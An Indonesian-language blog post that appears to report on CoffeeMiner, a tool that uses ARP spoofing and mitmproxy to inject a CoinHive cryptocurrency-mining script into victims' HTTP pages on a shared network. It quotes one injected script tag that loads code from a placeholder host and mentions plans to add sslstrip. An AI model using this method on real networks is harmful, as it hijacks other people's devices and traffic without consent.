akhir 2017 lalu maraknya para peretas yang membuat code scripting untuk minner dengan sedemikian rupa, mereka mecoba dengan beberapa cara dari mulai website sampai smartphone.
baru baru ini. seorang developer pengembang dengan nama akun "arnau" telah membuat cara bagaiamana para hacker menambang dengan scipt malwarenya di browser.
arnau, menciptakan salah satu tools dengan nama " Coffie Minner" tujuannya memotong lalu lintas antara pengguna dan router untuk menyuntikkan skrip ke halaman HTML.
coffie minner berkeja memanipulasi korban dengan salah satu methode ARPsfooping guna untuk menipu jaringan ip ke jaringan MAC dengan cara menipu jaringan Lokal.
dan ini gambaran tools coffie minner berkerja :
dalam kerja coffie minner ini juga di lengkapi salah satu analisis proxy yaitu MITMproxy, mitmproxy ini berguna untuk analisis arus lalu lintas data, disini ia beraksi untuk menyutikan salah satu baris code ke dalam halaman HTML, dengan script ini para peretas bisa memangil penambang pada cryptocurency javascript yang di kerahkan untuk menyerang web tersebut.
dan ini salah satu inject code nya : <script src=http://httpserver/8080:script.js
arnau, mengatakan penambangan ini menggunakan javascript CoinHive, " Coinhive menawarkan penambangan menggunakan javascript, javascipt ini lah yang berkejra menambang coin monero pada blockhain yng bisa di sematkan ke situs lain dengan script code tersebut, namun coffie minner ini hanya bekerja di http saja tidak HTTPs, namun saya akan menambahkan sslstrip untuk menyuntukan HTTPs dan pemindaian nmap, dan juga saya akan menambahkan ip yang tereteksi ke daftar korban coffie minner".
untuk lebih lengkapnya tentang tools ini bisa anda kunjungi situs githubnya : github
EmoticonEmoticon